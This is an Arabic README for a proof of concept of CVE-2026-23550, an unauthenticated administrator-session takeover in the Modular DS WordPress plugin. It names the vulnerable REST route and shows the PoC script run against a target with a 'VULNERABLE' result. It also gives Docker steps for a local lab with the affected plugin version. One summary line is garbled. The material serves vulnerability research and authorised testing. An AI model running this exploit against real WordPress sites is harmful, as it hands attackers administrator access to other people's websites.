
CVE-2026-23550 - إضافة ووردبريس Modular DS **وصول غير مصادق إلى لوحة التحكم**
إثبات المفهوم (PoC) يوضح CVE-2026-23550 - استيلاء حرج غير مصادق عليه على حساب المدير في إضافة Modular DS لووردبريس (الإصدارات ≤2.5.1). يتم استغلالها بنشاط في البرية.

ملخص الهجوم: توجيه معيب لواجهة REST API في /api/modular-connector/login يتجاوز مصادقة ووردبريس عندما يكون ، مما يمنح ملفات تعريف ارتباط جلسة مدير غير مصادق عليها.
origin=mo# PoC جاهز للإنتاج
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Admin session cookie issued
نقطة نهاية REST المتأثرة يمكن الوصول إليها حصريًا عبر آلية ?rest_route=؛ قد يكون الوصول المباشر عبر /wp-json/ غير متاح. تسمح الثغرة بالوصول غير المصادق عليه دون الحاجة إلى بيانات اعتماد أو التحقق من nonce. يُعد إصدار ملف تعريف ارتباط جلسة مدير ووردبريس بنجاح تأكيدًا على الاستغلال. لا ينفذ إثبات المفهوم هذا أي إجراءات إدارية. تم استخدام إصدار Modular DS 2.5.0 أثناء الاختبار.
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
انتظر حتى: "ready for connections"
curl http://localhost:8080/?rest_route=/
المتوقع:
{
"name": "...",
"namespaces": [...]
}
إذا فشل هذا → توقف، البيئة معطلة.
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
ملاحظة: إذا كنت تريد ملفات تعريف الارتباط في ملف نصي فقم بإزالة "rm -f "$COOKIE_JAR"" من ملف poc.sh.
رخصة MIT - لأغراض البحث الأمني والاختبارات المخولة فقط. ليست للاستخدام الخبيث. افصح عن الثغرات بمسؤولية.
إثبات المفهوم هذا مخصص للاختبارات الأمنية المخولة فقط. الاستخدام غير المصرح به ضد أنظمة الإنتاج غير قانوني. أبلغ عن النتائج إلى مطوري الإضافة.